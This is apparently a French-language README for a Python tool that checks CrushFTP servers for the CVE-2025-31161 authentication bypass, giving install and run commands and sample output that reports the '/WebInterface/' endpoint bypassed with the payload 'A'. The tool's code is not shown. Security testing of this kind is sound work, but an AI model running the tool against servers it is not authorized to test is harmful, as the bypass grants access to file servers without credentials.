
Scanne la cible pour voir si elle est vulnérable à CVE-2025-31161
Un outil Python pour détecter et tester la vulnérabilité CVE-2025-31161 dans les serveurs CrushFTP.
Ce script teste la vulnérabilité de contournement d'authentification (CVE-2025-31161) dans les serveurs CrushFTP, qui permet à des attaquants distants de s'authentifier sans informations d'identification valides en manipulant l'en-tête HTTP Authorization.
python3 CVE-2025-31161.py
git clone https://github.com/yourusername/CVE-2025-31161.py
cd CVE-2025-31161.py
pip3 install -r requirements.txt
$ python3 CVE-2025-31161.py
Entrez l'adresse IP cible: 192.168.1.100
Entrez le port cible [8080]: 8080
==================================================
📡 Test : /WebInterface/
🔑 Charge utile : 'A'
📊 Statut : 200
🎉 VULNÉRABILITÉ CONFIRMÉE
💡 200 OK avec contenu : dashboard, main
✅ Charge utile fonctionnelle : 'A'
==================================================
🎯 Cible : 192.168.1.100:8080
🔴 STATUT DE LA VULNÉRABILITÉ : VULNÉRABLE
💥 Contournement d'authentification CVE-2025-31161 CONFIRMÉ
✅ Charges utiles fonctionnelles :
==================================================
Cet outil est destiné uniquement à des fins éducatives et de tests autorisés. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.